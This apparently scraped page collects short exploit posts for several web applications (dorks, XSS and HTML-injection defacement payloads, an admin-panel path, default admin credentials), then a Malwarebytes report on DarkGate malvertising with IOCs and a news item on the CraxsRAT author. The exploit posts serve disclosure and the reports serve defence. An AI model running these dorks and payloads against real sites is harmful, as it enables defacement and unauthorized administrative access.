G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

**G And G Corporate CMS 1.0 Cross Site Scripting**

Posted Aug 23, 2023

Authored by indoushka

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ec7e6459653c2e6f1683c120c47e58e61d870a911a466497ef2ef99455a30669

Download | Favorite | View

**G And G Corporate CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : G&G Corporate CMS v1.0  XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://gegweb.it                                                                                                   |  | # Dork      : intext:Powered by Studio G&G Corporate Communication site:it                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,006)
*   Arbitrary (16,212)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,952)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,147)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,799)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,186)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,383)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,953)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,504)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,750)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,835)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

G And G Corporate CMS 1.0 Cross Site Scripting

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

**FreshRSS 1.11.1 HTML Injection**

Posted Aug 23, 2023

Authored by indoushka

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

tags | exploit

SHA-256 | c789b4001ff7c396e22af1e82b8f9c8c3a4f13f593828eb66d0a73226d79294b

Download | Favorite | View

**FreshRSS 1.11.1 HTML Injection**

    ====================================================================================================================================| # Title     : FreshRSS v1.11.1 Html Inject Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://freshrss.org/                                                                                              |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  https://demo127.0.0.1/freshrssorg/i/?c=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,006)
*   Arbitrary (16,212)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,952)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,147)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,799)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,186)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,383)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,953)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,504)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,750)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,835)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

FreshRSS 1.11.1 HTML Injection

Forum Fire Soft Board version 0.3.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Forum Fire Soft Board v0.3.0 XSS Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://github.com/FSB                                                                                             || # Dork      : Forum Fire-Soft-Board © 2004 - 2014                                                                                |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine.[+]  use payload : index.php?direction=DESC&g_id=2&like=begin%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%3d%22&limit=30&module=2&order=u_total_post&p=userlist&page=1&search_user=[+]  http://target_site/index.php?direction=DESC&g_id=2&like=begin%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%3d%22&limit=30&module=2&order=u_total_post&p=userlist&page=1&search_user=Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Forum Fire Soft Board 0.3.0 Cross Site Scripting

Forma LMS version 1.4 suffers from a database disclosure vulnerability.

    ====================================================================================================================================| # Title     : Forma lms v1.4 Database Disclosure Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.formalms.org/                                                                                           || # Dork      : Copyright (c) forma.lms Powered by forma.lms CE                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Allow visitors to download the configuration file but without the database information.[+] http://127.0.0.1/icsgboscotarantogovit/forma/install/download_conf.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Forma LMS 1.4 Database Disclosure

Foodiee CMS version 1.0.1 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Foodiee CMS v1.0.1 Insecure Direct Object Reference Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit)                                             || # Vendor    : https://foodie.com.np/                                                                                             || # Dork      : "restaurants_details.php?id="                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference Allows full control of the website.[+] Use payload : /admin/dashboard.php[+] http://127.0.0.1/wwwmaulikbazarcom/admin/dashboard.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Foodiee CMS 1.0.1 Insecure Direct Object Reference

Foodiee Online Food Ordering Web Application version 1.0.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Foodiee - Online Food Ordering Web Application V1.0.0 Insecure Settings Vulnerability                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/foodiee-restaurant-web-application/23335754?s_rank=57                                  |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Use Backdoor Account : Username – admin@foodiee.com                           Password – 123456                   [+] Panel : http://127.0.0.1/themeforestkamleshyadavnet/script/foodiee/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Foodiee Online Food Ordering Web Application 1.0.0 Insecure Settings

FlightPath LMS version 4.8.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v4.8.2 XSS Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=<--`<script>alert(/indoushka/);</script>``> --!>[+] https://127.0.0.1/webservicesulmedu/flightpath/tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 4.8.2 Cross Site Scripting

FixBook Repair Shop Management Tool version 3.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : FixBook - Repair Shop Management Tool v3.0 Password Hash Disclosure Vulnerability                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/fixbook-repair-shop-management-tool/12333567                                           || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Open the source code of the page[+] Go 2 line 49  found pass of databass encrypted . view-source:http://target_site/repair/update/[+] Here Update admin information : http://127.0.0.1/repair/update/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FixBook Repair Shop Management Tool 3.0 Hash Disclosure

Categories: Threat Intelligence
Tags: darkgate

Tags: autoit

Tags: malvertising

Tags: seo poisoning

The new version of the DarkGate malware is currently actively being distributed via malspam, malicious ads and SEO poisoning.



(Read more...)




The post DarkGate reloaded via malvertising and SEO poisoning campaigns appeared first on Malwarebytes Labs.

In July 2023, we observed a malvertising campaign that lured potential victims to a fraudulent site for a Windows IT management tool. Unlike previous similar attacks, the final payload was packaged differently and not immediately recognizable.

The decoy file came as an MSI installer containing an AutoIT script where the payload was obfuscated to avoid detection. Upon analysis and comparison, we determined that this sample was an updated version of DarkGate, a multi purpose malware toolkit first identified in 2018. 

Since the malware's obfuscation and encryption features have been recently documented by other researchers, we will focus on two of its web delivery methods, namely the use of malicious ads and search engine poisoning.

The campaigns we observed coincide with an announcement from DarkGate's developer in June as well, boasting about the malware's new capabilities and limited customer seats.

**New DarkGate**

In its debut back in 2018 and later in 2020, DarkGate (also known as MehCrypter) was distributed via torrent sites and mostly focused on European victims and Spanish users in particular. The original blog post from enSilo (now Fortinet) also notes that its author may have been using email to spread malicious attachments.

In June 2023, a threat actor going by the handle RastaFarEye posted an advertisement in the XSS underground forum about a project known as DarkGate. As detailed by the ZeroFox Dark Ops intelligence team, the new version includes certain key features to evade detection while offering the expected credential stealing capabilities. The cost ($100K/year) and limited availability (10 customers) make DarkGate somewhat of an elusive toolkit.

Photo credit: ZeroFox Dark Ops intelligence team

Two blog posts came out in early August, identifying new DarkGate attacks:

*   Aon's Stroz Friedberg Incident Response Services details how they encountered a recent incident from a group similar to ScatteredSpider (UNC3944) that was using this new version of DarkGate.
*   Researcher 0xToxin wrote about phishing emails distributing a loader leading to DarkGate, with a complete technical analysis of the malware.

**Malvertising**

While investigating malvertising campaigns, we observed the following Google ad on on July 13, 2023:

Advanced IP Scanner is a popular tool used by IT administrators. Victims who click on the ad are presented with a decoy site:

The downloaded file (_Advanced\_IP\_Scanner\_2.5.4594.1.msi_) is an installer that contains the legitimate Advanced IP Scanner binary but also some extra files that are unpacked in the %temp% folder upon execution:

We recognize the familiar use of AutoIT which was already present in the very early versions of DarkGate.

Note: The same threat actor was also serving malicious ads via Bing as documented by Cyberuptive on August 8, 2023.

**SEO poisoning**

SEO poisoning is an old technique used by various threat actors and scammers who attempt to game search engines' ranking system. Although it takes a little more time to roll out, it is an effective way to trick users into visiting malicious sites.

The following search result appeared on Google:

The domain advancedscanner\[.\]link was created on 2023-07-28 and is used to redirect to the decoy page hosted at ipadvancedscanner\[.\]com. The downloaded file, IPAVSCAN\_win\_vers\_1.1.3.msi, also has the same AutoIt encrypted payload:

**Anti-VM and other checks**

We noticed that several of the newly registered domains associated with these campaigns had implemented advanced fingerprinting checks. We recently documented this trend which could soon become the norm due to its ease of use.

Here's another lure, this time for Angry IP Scanner, with a domain (ipangry\[.\]com registered 2023-07-29):

The payload, angry\_win\_0.47\_installer.msi and its AutoIt script:

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. They are also diversifying their delivery techniques by leveraging malspam, malvertising and SEO poisoning.

Malwarebytes' anti-malware engine detects this malware as Backdoor.DarkGate and our web protection blocks its known command and control servers.

Malwarebytes for Business (EDR) customers may also see the following alerts:

**Indicators of Compromise**

**Malvertising campaign**

top\[.\]advscan\[.\]com  
advanced-ips-scanne\[.\]com  
a4scan\[.\]com  
advanced-ip-scanne\[.\]com

**SEO poisoning campaign**

advancedscanner\[.\]link  
ipadvancedscanner\[.\]com  
185.224.137\[.\]54  
185.11.61\[.\]65

**DarkGate samples**

e5ca3a8732a4645de632d0a6edfaf064bdd34a4824102fbc2b328a974350db8f  
206042ec2b6bc377296c8b7901ce1a00c393df89e7c4cbbb1b8da1a86a153b67  
9a7db0204847d26515ed249f9ed577220326f63a724a2e0fb6bb1d8cd33508a3

**DarkGate C2s**

80.66.88\[.\]145  
107.181.161\[.\]200

**Additional resources**

*   0xToxin's payload decryptor
*   RussianPanda's DarkGate config extractor

DarkGate reloaded via malvertising and SEO poisoning campaigns

A Syrian threat actor named EVLF has been outed as the creator of malware families CypherRAT and CraxsRAT.
"These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," Cybersecurity firm Cyfirma said in a report published last week.
CypherRAT and CraxsRAT are said to be offered to other cybercriminals as

Mobile Security / Cyber Crime

A Syrian threat actor named **EVLF** has been outed as the creator of malware families CypherRAT and CraxsRAT.

"These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," Cybersecurity firm Cyfirma said in a report published last week.

CypherRAT and CraxsRAT are said to be offered to other cybercriminals as part of a malware-as-a-service (MaaS) scheme. As many as 100 unique threat actors are estimated to have purchased the twin tools on a lifetime license over the past three years.

EVLF is said to be operating a web shop to advertise their warez since at least September 2022.

CraxsRAT is billed as an Android trojan that enables a threat actor to remote control an infected device from a Windows computer, with the developer consistently releasing new updates based on feedback from the customers.

The malicious package is generated using a builder, which comes with options to customize and obfuscate the payload, choose an icon, the app name, and the features and permissions that need to be activated once installed on the smartphone.

"CraxsRAT is one of the most dangerous RATs in the current Android threat landscape, with impactful features such as Google Play protect bypass, live screen view, as well as a shell for command execution," Cyfirma explained.

"The 'Super Mod' feature renders the app more deadly still, making it hard for victims to uninstall the app (whenever the victim tries to uninstall, it crashes the page)."

The Android malware also requests victims to grant it permissions to Android's accessibility services, allowing it to harvest a wealth of information that would be valuable to cyber criminals, including call logs, contacts, external storage, location, and SMS messages.

EVLF has been observed operating a Telegram channel named "EvLF Devz" that was created on February 17, 2022. It has 10,678 subscribers as of writing.

A search for CraxsRAT surfaces numerous cracked versions of the malware hosted on GitHub, although it appears that Microsoft has taken down some of them over the past few days. The GitHub account of EVLF, however, remains active on the code-hosting service.

On August 23, 2023, EVLF posted a message on the channel saying they were hanging up the boots on the project, likely in response to the public disclosure of their activities.

"unfortunately this is the end , due to life circumstances i will stop developing and posting," EVLF said in the post. "for my customers don't worry , i will not let you and go , i will release couple of patch's for you before i go."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows